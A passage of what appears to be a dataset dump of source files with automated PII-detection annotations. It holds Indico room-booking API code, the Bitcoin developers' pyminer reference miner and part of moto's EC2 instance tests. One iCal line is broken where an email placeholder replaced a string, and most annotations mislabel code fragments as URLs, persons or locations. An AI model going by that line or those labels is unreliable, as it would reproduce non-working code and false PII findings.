found)'.format(len(avatars))) + avatar = avatars[0] + + self._params = { + 'room_id': get_query_parameter(self._queryParams, 'roomid'), + 'reason': get_query_parameter(self._queryParams, 'reason'), + 'booked_for': avatar, + 'from': self._fromDT, + 'to': self._toDT + } + missing = [key for key, val in self._params.iteritems() if not val] + if missing: + raise HTTPAPIError('Required params missing: {}'.format(', '.join(missing))) + self._room = Room.get(self._params['room_id']) + if not self._room: + raise HTTPAPIError('A room with this ID does not exist') + + def _hasAccess(self, aw): + if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()): + return False + if self._room.can_be_booked(aw.getUser()): + return True + elif
self._room.can_be_prebooked(aw.getUser()): + raise HTTPAPIError('The API only supports direct bookings but this room only allows pre-bookings.') + return False + + def api_roomBooking(self, aw): + data = MultiDict({ + 'start_dt': self._params['from'], + 'end_dt': self._params['to'], + 'repeat_frequency': RepeatFrequency.NEVER, + 'repeat_interval': 0, + 'room_id': self._room.id, + 'booked_for_id': self._params['booked_for'].getId(), + 'contact_email': self._params['booked_for'].getEmail(), + 'contact_phone': self._params['booked_for'].getTelephone(), + 'booking_reason': self._params['reason'] + }) + try: + reservation = Reservation.create_from_data(self._room, data, aw.getUser()) + except ConflictingOccurrences: + raise HTTPAPIError('Failed to create the booking due to conflicts with other bookings') + except IndicoError as e: + raise HTTPAPIError('Failed to create the booking: {}'.format(e)) + db.session.add(reservation) + db.session.flush() + return {'reservationID': reservation.id} + + +def _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None): + """"""Exports reservations. + + :param hook: The HTTPAPIHook instance + :param limit_per_room: Should the limit/offset be applied per room + :param include_rooms: Should reservations include room information + """""" + filters = list(extra_filters) if extra_filters else [] + if hook._fromDT and hook._toDT: + filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date()) + filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date()) + filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time()) + filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time()) + elif hook._toDT: + filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date()) + filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time()) + elif hook._fromDT: + filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date()) + filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time()) + filters += _get_reservation_state_filter(hook._queryParams) + occurs = [datetime.strptime(x, '%Y-%m-%d').date() + for x in filter(None, get_query_parameter(hook._queryParams, ['occurs'], '').split(','))] + data = ['vc_equipment'] + if hook._occurrences: + data.append('occurrences') + order = { + 'start': Reservation.start_dt, + 'end': Reservation.end_dt + }.get(hook._orderBy, Reservation.start_dt) + if hook._descending: + order = order.desc() + reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset, + order=order, limit_per_room=limit_per_room, occurs_on=occurs) + for result in reservations_data: + yield result['reservation'].room_id, _serializable_reservation(result, include_rooms) + + +def _serializable_room(room_data, reservations=None): + """"""Serializable room data + + :param room_data: Room data + :param reservations: MultiDict mapping for room id => reservations + """""" + data = room_data['room'].to_serializable('__api_public__') + data['_type'] = 'Room' + data['avc'] = bool(room_data['vc_equipment']) + data['vcList'] = room_data['vc_equipment'] + data['equipment'] = room_data['non_vc_equipment'] + if reservations is not None: + data['reservations'] = reservations.getlist(room_data['room'].id) + return data + + +def _serializable_room_minimal(room): + """"""Serializable minimal room data (inside reservations) + + :param room: A `Room` + """""" + data = room.to_serializable('__api_minimal_public__') + data['_type'] = 'Room' + return data + + +def 
_serializable_reservation(reservation_data, include_room=False): + """"""Serializable reservation (standalone or inside room) + + :param reservation_data: Reservation data + :param include_room: Include minimal room information + """""" + reservation = reservation_data['reservation'] + data = reservation.to_serializable('__api_public__', converters={datetime: _add_server_tz}) + data['_type'] = 'Reservation' + data['repeatability'] = None + if reservation.repeat_frequency: + data['repeatability'] = RepeatMapping.get_short_name(*reservation.repetition) + data['vcList'] = reservation_data['vc_equipment'] + if include_room: + data['room'] = _serializable_room_minimal(reservation_data['reservation'].room) + if 'occurrences' in reservation_data: + data['occurrences'] = [o.to_serializable('__api_public__', converters={datetime: _add_server_tz}) + for o in reservation_data['occurrences']] + return data + + +def _ical_serialize_repeatability(data): + start_dt_utc = data['startDT'].astimezone(pytz.utc) + end_dt_utc = data['endDT'].astimezone(pytz.utc) + WEEK_DAYS = 'MO TU WE TH FR SA SU'.split() + recur = ical.vRecur() + recur['until'] = end_dt_utc + if data['repeat_frequency'] == RepeatFrequency.DAY: + recur['freq'] = 'daily' + elif data['repeat_frequency'] == RepeatFrequency.WEEK: + recur['freq'] = 'weekly' + recur['interval'] = data['repeat_interval'] + elif data['repeat_frequency'] == RepeatFrequency.MONTH: + recur['freq'] = 'monthly' + recur['byday'] = '{}{}'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()]) + return recur + + +def _ical_serialize_reservation(cal, data, now): + start_dt_utc = data['startDT'].astimezone(pytz.utc) + end_dt_utc = datetime.combine(data['startDT'].date(), data['endDT'].timetz()).astimezone(pytz.utc) + + event = icalendar.Event() + event.add('uid', dummy@email.com' % data['id']) + event.add('dtstamp', now) + event.add('dtstart', start_dt_utc) + event.add('dtend', end_dt_utc) + event.add('url', data['bookingUrl']) + event.add('summary', data['reason']) + event.add('location', u'{}: {}'.format(data['location'], data['room']['fullName'])) + event.add('description', data['reason'].decode('utf-8') + '\n\n' + data['bookingUrl']) + if data['repeat_frequency'] != RepeatFrequency.NEVER: + event.add('rrule', _ical_serialize_repeatability(data)) + cal.add_component(event) + + +def _add_server_tz(dt): + if dt.tzinfo is None: + return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone())) + return dt + + +def _yesno(value): + return value.lower() in {'yes', 'y', '1', 'true'} + + +def _get_reservation_state_filter(params): + cancelled = get_query_parameter(params, ['cxl', 'cancelled']) + rejected = get_query_parameter(params, ['rej', 'rejected']) + confirmed = get_query_parameter(params, ['confirmed']) + archived = get_query_parameter(params, ['arch', 'archived', 'archival']) + repeating = get_query_parameter(params, ['rec', 'recurring', 'rep', 'repeating']) + avc = get_query_parameter(params, ['avc']) + avc_support = get_query_parameter(params, ['avcs', 'avcsupport']) + startup_support = get_query_parameter(params, ['sts', 'startupsupport']) + booked_for = get_query_parameter(params, ['bf', 'bookedfor']) + + filters = [] + if cancelled is not None: + filters.append(Reservation.is_cancelled == _yesno(cancelled)) + if rejected is not None: + filters.append(Reservation.is_rejected == _yesno(rejected)) + if confirmed is not None: + if confirmed == 'pending': + filters.append(Reservation.is_pending) + elif _yesno(confirmed): + 
filters.append(Reservation.is_accepted) + else: + filters.append(~Reservation.is_accepted) + filters.append(Reservation.is_rejected | Reservation.is_cancelled) + if archived is not None: + filters.append(Reservation.is_archived == _yesno(archived)) + if repeating is not None: + if _yesno(repeating): + filters.append(Reservation.repeat_frequency != 0) + else: + filters.append(Reservation.repeat_frequency == 0) + if avc is not None: + filters.append(Reservation.uses_vc == _yesno(avc)) + if avc_support is not None: + filters.append(Reservation.needs_vc_assistance == _yesno(avc_support)) + if startup_support is not None: + filters.append(Reservation.needs_assistance == _yesno(startup_support)) + if booked_for: + like_str = '%{}%'.format(booked_for.replace('?', '_').replace('*', '%')) + filters.append(Reservation.booked_for_name.ilike(like_str)) + return filters +",16517,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'Indico'], ['DATE_TIME', '2002 - 2013'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'indico.modules.rb.models.rooms'], ['LOCATION', 'super(RoomBookingHookBase'], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'self)._getParams'], ['PERSON', 'self)._getParams'], ['DATE_TIME', ""the same day'""], ['PERSON', ""HTTPAPIError('You""], ['PERSON', 'NEVER'], ['PERSON', ""self._params['reason""], ['PERSON', 'db.session.flush'], ['PERSON', 'include_rooms'], ['PERSON', '.split'], ['PERSON', 'reservations_data = Reservation.get_with_data(*data'], ['PERSON', 'include_rooms'], ['NRP', 'MultiDict'], ['LOCATION', 'serializable_reservation(reservation_data'], ['DATE_TIME', 'daily'], ['DATE_TIME', 'weekly'], ['DATE_TIME', 'monthly'], ['DATE_TIME', 'WEEK_DAYS[start_dt_utc.weekday'], ['PERSON', ""data['id""], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'RepeatFrequency.NE'], ['PERSON', 'bookedfor'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'indico.core.co'], ['URL', 'indico.co'], ['URL', 'indico.core.er'], ['URL', 'indico.mo'], ['URL', 'indico.modules.rb.models.re'], ['URL', 'indico.modules.rb.mo'], ['URL', 'indico.modules.rb.models.ro'], ['URL', 'indico.web.ht'], ['URL', 'indico.web.ht'], ['URL', 'api.me'], ['URL', 'indico.web.ht'], ['URL', 'api.re'], ['URL', 'indico.web.ht'], ['URL', 'MaKaC.au'], ['URL', 'MaKaC.common.in'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'Room.id.in'], ['URL', 'loc.id'], ['URL', 'Reservation.ro'], ['URL', 'id.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Config.ge'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'loc.id'], ['URL', 'Room.name.il'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Location.name.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'datetime.no'], ['URL', 'params.it'], ['URL', 'Room.ge'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'RepeatFrequency.NE'], ['URL', 'room.id'], ['URL', 'Reservation.cr'], ['URL', 'aw.ge'], ['URL', 'db.session.ad'], ['URL', 'db.se'], ['URL', 'reservation.id'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'datetime.st'], 
['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'order.de'], ['URL', 'Reservation.ge'], ['URL', 'reservations.ge'], ['URL', 'room.to'], ['URL', 'reservation.to'], ['URL', 'reservation.re'], ['URL', 'RepeatMapping.ge'], ['URL', 'reservation.re'], ['URL', 'o.to'], ['URL', 'RepeatFrequency.MO'], ['URL', 'datetime.com'], ['URL', 'event.ad'], ['URL', 'email.com'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'cal.ad'], ['URL', 'dt.tz'], ['URL', 'dt.re'], ['URL', 'HelperMaKaCInfo.ge'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.re'], ['URL', 'Reservation.re'], ['URL', 'Reservation.us'], ['URL', 'Reservation.ne'], ['URL', 'Reservation.ne'], ['URL', 'for.re'], ['URL', 'Reservation.bo'], ['URL', 'name.il']]" +67,"#!/usr/bin/python +# +# Copyright (c) 2011 The Bitcoin developers +# Distributed under the MIT/X11 software license, see the accompanying +# file COPYING or http://www.opensource.org/licenses/mit-license.php. +# + +import time +import json +import pprint +import hashlib +import struct +import re +import base64 +import httplib +import sys +from multiprocessing import Process + +ERR_SLEEP = 15 +MAX_NONCE = 1000000L + +settings = {} +pp = pprint.PrettyPrinter(indent=4) + +class BitcoinRPC: + OBJID = 1 + + def __init__(self, host, port, username, password): + authpair = ""%s:%s"" % (username, password) + self.authhdr = ""Basic %s"" % (base64.b64encode(authpair)) + self.conn = httplib.HTTPConnection(host, port, False, 30) + def rpc(self, method, params=None): + self.OBJID += 1 + obj = { 'version' : '1.1', + 'method' : method, + 'id' : self.OBJID } + if params is None: + obj['params'] = [] + else: + obj['params'] = params + self.conn.request('POST', '/', json.dumps(obj), + { 'Authorization' : self.authhdr, + 'Content-type' : 'application/json' }) + + resp = self.conn.getresponse() + if resp is None: + print ""JSON-RPC: no response"" + return None + + body = resp.read() + resp_obj = json.loads(body) + if resp_obj is None: + print ""JSON-RPC: cannot JSON-decode body"" + return None + if 'error' in resp_obj and resp_obj['error'] != None: + return resp_obj['error'] + if 'result' not in resp_obj: + print ""JSON-RPC: no result in object"" + return None + + return resp_obj['result'] + def getblockcount(self): + return self.rpc('getblockcount') + def getwork(self, data=None): + return self.rpc('getwork', data) + +def uint32(x): + return x & 0xffffffffL + +def bytereverse(x): + return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) | + (((x) >> 8) & 0x0000ff00) | ((x) >> 24) )) + +def bufreverse(in_buf): + out_words = [] + for i in range(0, len(in_buf), 4): + word = struct.unpack('@I', in_buf[i:i+4])[0] + out_words.append(struct.pack('@I', bytereverse(word))) + return ''.join(out_words) + +def wordreverse(in_buf): + out_words = [] + for i in range(0, len(in_buf), 4): + out_words.append(in_buf[i:i+4]) + out_words.reverse() + return ''.join(out_words) + +class Miner: + def __init__(self, id): + self.id = id + self.max_nonce = MAX_NONCE + + def work(self, datastr, targetstr): + # decode work data hex string to binary + static_data = datastr.decode('hex') + static_data = bufreverse(static_data) + + # the first 76b of 80b do not change + blk_hdr = static_data[:76] + + # decode 256-bit target value + targetbin = targetstr.decode('hex') + 
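+ # Illustrative example (made-up value): target hex '11223344' decodes + # to bytes 11 22 33 44; the [::-1] reversal below yields 44 33 22 11, + # i.e. 0x44332211, matching the byte order of the reversed hash it is + # compared against in the proof-of-work test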
targetbin = targetbin[::-1] # byte-swap and dword-swap + targetbin_str = targetbin.encode('hex') + target = long(targetbin_str, 16) + + # pre-hash first 76b of block header + static_hash = hashlib.sha256() + static_hash.update(blk_hdr) + + for nonce in xrange(self.max_nonce): + + # encode 32-bit nonce value + nonce_bin = struct.pack(""<I"", nonce) + + # hash final 4b, the nonce value + hash1_o = static_hash.copy() + hash1_o.update(nonce_bin) + hash1 = hash1_o.digest() + + # sha256 hash of sha256 hash + hash_o = hashlib.sha256() + hash_o.update(hash1) + hash = hash_o.digest() + + # quick test for winning solution: high 32 bits zero? + if hash[-4:] != '\0\0\0\0': + continue + + # convert binary hash to 256-bit Python long + hash = bufreverse(hash) + hash = wordreverse(hash) + hash_str = hash.encode('hex') + l = long(hash_str, 16) + + # proof-of-work test: hash < target + if l < target: + print time.asctime(), ""PROOF-OF-WORK found: %064x"" % (l,) + return (nonce + 1, nonce_bin) + else: + print time.asctime(), ""PROOF-OF-WORK false positive %064x"" % (l,) +# return (nonce + 1, nonce_bin) + + return (nonce + 1, None) + + def submit_work(self, rpc, original_data, nonce_bin): + nonce_bin = bufreverse(nonce_bin) + nonce = nonce_bin.encode('hex') + solution = original_data[:152] + nonce + original_data[160:256] + param_arr = [ solution ] + result = rpc.getwork(param_arr) + print time.asctime(), ""--> Upstream RPC result:"", result + + def iterate(self, rpc): + work = rpc.getwork() + if work is None: + time.sleep(ERR_SLEEP) + return + if 'data' not in work or 'target' not in work: + time.sleep(ERR_SLEEP) + return + + time_start = time.time() + + (hashes_done, nonce_bin) = self.work(work['data'], + work['target']) + + time_end = time.time() + time_diff = time_end - time_start + + self.max_nonce = long( + (hashes_done * settings['scantime']) / time_diff) + if self.max_nonce > 0xfffffffaL: + self.max_nonce = 0xfffffffaL + + if settings['hashmeter']: + print ""HashMeter(%d): %d hashes, %.2f Khash/sec"" % ( + self.id, hashes_done, + (hashes_done / 1000.0) / time_diff) + + if nonce_bin is not None: + self.submit_work(rpc, work['data'], nonce_bin) + + def loop(self): + rpc = BitcoinRPC(settings['host'], settings['port'], + settings['rpcuser'], settings['rpcpass']) + if rpc is None: + return + + while True: + self.iterate(rpc) + +def miner_thread(id): + miner = Miner(id) + miner.loop() + +if __name__ == '__main__': + if len(sys.argv) != 2: + print ""Usage: pyminer.py CONFIG-FILE"" + sys.exit(1) + + f = open(sys.argv[1]) + for line in f: + # skip comment lines + m = re.search('^\s*#', line) + if m: + continue + + # parse key=value lines + m = re.search('^(\w+)\s*=\s*(\S.*)$', line) + if m is None: + continue + settings[m.group(1)] = m.group(2) + f.close() + + if 'host' not in settings: + settings['host'] = '127.0.0.1' + if 'port' not in settings: + settings['port'] = 9131 + if 'threads' not in settings: + settings['threads'] = 1 + if 'hashmeter' not in settings: + settings['hashmeter'] = 0 + if 'scantime' not in settings: + settings['scantime'] = 30L + if 'rpcuser' not in settings or 'rpcpass' not in settings: + print ""Missing username and/or password in cfg file"" + sys.exit(1) + + settings['port'] = int(settings['port']) + settings['threads'] = int(settings['threads']) + settings['hashmeter'] = int(settings['hashmeter']) + settings['scantime'] = long(settings['scantime']) + + thr_list = [] + for thr_id in range(settings['threads']): + p = Process(target=miner_thread, args=(thr_id,)) + p.start() + thr_list.append(p) + time.sleep(1) # stagger threads + + print settings['threads'], ""mining threads started"" + + print time.asctime(), ""Miner Starts - %s:%s"" % (settings['host'], settings['port']) + try: + for thr_proc in thr_list: + thr_proc.join() + except KeyboardInterrupt: + pass + print time.asctime(), ""Miner Stops - %s:%s"" % (settings['host'], settings['port']) + +",6434,"[['DATE_TIME', '2011'], ['PERSON', ""out_words.append(struct.pack('@I""], ['PERSON', 'Miner'], ['LOCATION', 'targetstr'], ['DATE_TIME', 'the first 76b of 80b'], ['DATE_TIME', '16'], ['PERSON', 'hash1 = hash1_o.digest'], ['LOCATION', 'hash_o.update(hash1'], ['PERSON', 'param_arr ='], ['PERSON', 'hashes_done'], ['DATE_TIME', 'time_end - time_start'], ['PERSON', 'hashes_done'], ['PERSON', 'hashes_done'], ['PERSON', 'scantime'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '::'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pprint.Pr'], ['URL', 'self.au'], ['URL', 'self.co'], ['URL', 'httplib.HT'], ['URL', 'self.conn.re'], ['URL', 'self.au'], ['URL', 'self.conn.ge'], ['URL',
['URL', 'resp.re'], ['URL', 'struct.pa'], ['URL', 'words.re'], ['URL', 'self.id'], ['URL', 'self.ma'], ['URL', 'datastr.de'], ['URL', 'targetstr.de'], ['URL', 'hashlib.sh'], ['URL', 'self.ma'], ['URL', 'struct.pa'], ['URL', 'hash.co'], ['URL', 'hashlib.sh'], ['URL', 'time.as'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.id'], ['URL', 'self.su'], ['URL', 'self.it'], ['URL', 'sys.ar'], ['URL', 'pyminer.py'], ['URL', 'sys.ar'], ['URL', 're.se'], ['URL', 're.se'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'f.cl'], ['URL', 'p.st'], ['URL', 'time.sl'], ['URL', 'time.as'], ['URL', 'proc.jo'], ['URL', 'time.as']]" +68,"from __future__ import unicode_literals + +from botocore.exceptions import ClientError + +import pytest +from unittest import SkipTest + +import base64 +import ipaddress + +import six +import boto +import boto3 +from boto.ec2.instance import Reservation, InstanceAttribute +from boto.exception import EC2ResponseError +from freezegun import freeze_time +import sure # noqa + +from moto import mock_ec2_deprecated, mock_ec2, settings +from tests import EXAMPLE_AMI_ID +from tests.helpers import requires_boto_gte + + +if six.PY2: + decode_method = base64.decodestring +else: + decode_method = base64.decodebytes + +################ Test Readme ############### +def add_servers(ami_id, count): + conn = boto.connect_ec2() + for index in range(count): + conn.run_instances(ami_id) + + +@mock_ec2_deprecated +def test_add_servers(): + add_servers(EXAMPLE_AMI_ID, 2) + + conn = boto.connect_ec2() + reservations = conn.get_all_reservations() + assert len(reservations) == 2 + instance1 = reservations[0].instances[0] + assert instance1.image_id == EXAMPLE_AMI_ID + + +############################################ + + +@freeze_time(""2014-01-01 05:00:00"") +@mock_ec2_deprecated +def test_instance_launch_and_terminate(): + conn = boto.ec2.connect_to_region(""us-east-1"") + + with pytest.raises(EC2ResponseError) as ex: + reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + reservation = conn.run_instances(EXAMPLE_AMI_ID) + reservation.should.be.a(Reservation) + reservation.instances.should.have.length_of(1) + instance = reservation.instances[0] + instance.state.should.equal(""pending"") + + reservations = conn.get_all_reservations() + reservations.should.have.length_of(1) + reservations[0].id.should.equal(reservation.id) + instances = reservations[0].instances + instances.should.have.length_of(1) + instance = instances[0] + instance.id.should.equal(instance.id) + instance.state.should.equal(""running"") + instance.launch_time.should.equal(""2014-01-01T05:00:00.000Z"") + instance.vpc_id.shouldnt.equal(None) + instance.placement.should.equal(""us-east-1a"") + + root_device_name = instance.root_device_name + instance.block_device_mapping[root_device_name].status.should.equal(""in-use"") + volume_id = instance.block_device_mapping[root_device_name].volume_id + volume_id.should.match(r""vol-\w+"") + + volume = conn.get_all_volumes(volume_ids=[volume_id])[0] + volume.attach_data.instance_id.should.equal(instance.id) + volume.status.should.equal(""in-use"") + + with 
pytest.raises(EC2ResponseError) as ex: + conn.terminate_instances([instance.id], dry_run=True) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set"" + ) + + conn.terminate_instances([instance.id]) + + reservations = conn.get_all_reservations() + instance = reservations[0].instances[0] + instance.state.should.equal(""terminated"") + + +@mock_ec2 +def test_instance_terminate_discard_volumes(): + + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[ + { + ""DeviceName"": ""/dev/sda1"", + ""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": True}, + } + ], + ) + instance = result[0] + + instance_volume_ids = [] + for volume in instance.volumes.all(): + instance_volume_ids.append(volume.volume_id) + + instance.terminate() + instance.wait_until_terminated() + + assert not list(ec2_resource.volumes.all()) + + +@mock_ec2 +def test_instance_terminate_keep_volumes_explicit(): + + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[ + { + ""DeviceName"": ""/dev/sda1"", + ""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": False}, + } + ], + ) + instance = result[0] + + instance_volume_ids = [] + for volume in instance.volumes.all(): + instance_volume_ids.append(volume.volume_id) + + instance.terminate() + instance.wait_until_terminated() + + assert len(list(ec2_resource.volumes.all())) == 1 + + +@mock_ec2 +def test_instance_terminate_keep_volumes_implicit(): + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}}], + ) + instance = result[0] + + instance_volume_ids = [] + for volume in instance.volumes.all(): + instance_volume_ids.append(volume.volume_id) + + instance.terminate() + instance.wait_until_terminated() + + assert len(instance_volume_ids) == 1 + volume = ec2_resource.Volume(instance_volume_ids[0]) + volume.state.should.equal(""available"") + + +@mock_ec2 +def test_instance_terminate_detach_volumes(): + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[ + {""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}}, + {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}}, + ], + ) + instance = result[0] + for volume in instance.volumes.all(): + response = instance.detach_volume(VolumeId=volume.volume_id) + response[""State""].should.equal(""detaching"") + + instance.terminate() + instance.wait_until_terminated() + + assert len(list(ec2_resource.volumes.all())) == 2 + + +@mock_ec2 +def test_instance_detach_volume_wrong_path(): + ec2_resource = boto3.resource(""ec2"", ""us-west-1"") + result = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},], + ) + instance = result[0] + for volume in instance.volumes.all(): + with pytest.raises(ClientError) as ex: + instance.detach_volume(VolumeId=volume.volume_id, 
Device=""/dev/sdf"") + + ex.value.response[""Error""][""Code""].should.equal(""InvalidAttachment.NotFound"") + ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400) + ex.value.response[""Error""][""Message""].should.equal( + ""The volume {0} is not attached to instance {1} as device {2}"".format( + volume.volume_id, instance.instance_id, ""/dev/sdf"" + ) + ) + + +@mock_ec2_deprecated +def test_terminate_empty_instances(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError) + + +@freeze_time(""2014-01-01 05:00:00"") +@mock_ec2_deprecated +def test_instance_attach_volume(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID) + instance = reservation.instances[0] + + vol1 = conn.create_volume(size=36, zone=conn.region.name) + vol1.attach(instance.id, ""/dev/sda1"") + vol1.update() + vol2 = conn.create_volume(size=65, zone=conn.region.name) + vol2.attach(instance.id, ""/dev/sdb1"") + vol2.update() + vol3 = conn.create_volume(size=130, zone=conn.region.name) + vol3.attach(instance.id, ""/dev/sdc1"") + vol3.update() + + reservations = conn.get_all_reservations() + instance = reservations[0].instances[0] + + instance.block_device_mapping.should.have.length_of(3) + + for v in conn.get_all_volumes( + volume_ids=[instance.block_device_mapping[""/dev/sdc1""].volume_id] + ): + v.attach_data.instance_id.should.equal(instance.id) + # can do due to freeze_time decorator. + v.attach_data.attach_time.should.equal(instance.launch_time) + # can do due to freeze_time decorator. + v.create_time.should.equal(instance.launch_time) + v.region.name.should.equal(instance.region.name) + v.status.should.equal(""in-use"") + + +@mock_ec2_deprecated +def test_get_instances_by_id(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2) + instance1, instance2 = reservation.instances + + reservations = conn.get_all_reservations(instance_ids=[instance1.id]) + reservations.should.have.length_of(1) + reservation = reservations[0] + reservation.instances.should.have.length_of(1) + reservation.instances[0].id.should.equal(instance1.id) + + reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id]) + reservations.should.have.length_of(1) + reservation = reservations[0] + reservation.instances.should.have.length_of(2) + instance_ids = [instance.id for instance in reservation.instances] + instance_ids.should.equal([instance1.id, instance2.id]) + + # Call get_all_reservations with a bad id should raise an error + with pytest.raises(EC2ResponseError) as cm: + conn.get_all_reservations(instance_ids=[instance1.id, ""i-1234abcd""]) + cm.value.code.should.equal(""InvalidInstanceID.NotFound"") + cm.value.status.should.equal(400) + cm.value.request_id.should_not.be.none + + +@mock_ec2 +def test_get_paginated_instances(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + conn = boto3.resource(""ec2"", ""us-east-1"") + for i in range(100): + conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + resp = client.describe_instances(MaxResults=50) + reservations = resp[""Reservations""] + reservations.should.have.length_of(50) + next_token = resp[""NextToken""] + next_token.should_not.be.none + resp2 = client.describe_instances(NextToken=next_token) + reservations.extend(resp2[""Reservations""]) + reservations.should.have.length_of(100) + assert ""NextToken"" not in resp2.keys() + + +@mock_ec2 +def 
test_create_with_tags(): + ec2 = boto3.client(""ec2"", region_name=""us-west-2"") + instances = ec2.run_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + InstanceType=""t2.micro"", + TagSpecifications=[ + { + ""ResourceType"": ""instance"", + ""Tags"": [ + {""Key"": ""MY_TAG1"", ""Value"": ""MY_VALUE1""}, + {""Key"": ""MY_TAG2"", ""Value"": ""MY_VALUE2""}, + ], + }, + { + ""ResourceType"": ""instance"", + ""Tags"": [{""Key"": ""MY_TAG3"", ""Value"": ""MY_VALUE3""}], + }, + ], + ) + assert ""Tags"" in instances[""Instances""][0] + len(instances[""Instances""][0][""Tags""]).should.equal(3) + + +@mock_ec2_deprecated +def test_get_instances_filtering_by_state(): + conn = boto.connect_ec2() + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + + conn.terminate_instances([instance1.id]) + + reservations = conn.get_all_reservations(filters={""instance-state-name"": ""running""}) + reservations.should.have.length_of(1) + # Since we terminated instance1, only instance2 and instance3 should be + # returned + instance_ids = [instance.id for instance in reservations[0].instances] + set(instance_ids).should.equal(set([instance2.id, instance3.id])) + + reservations = conn.get_all_reservations( + [instance2.id], filters={""instance-state-name"": ""running""} + ) + reservations.should.have.length_of(1) + instance_ids = [instance.id 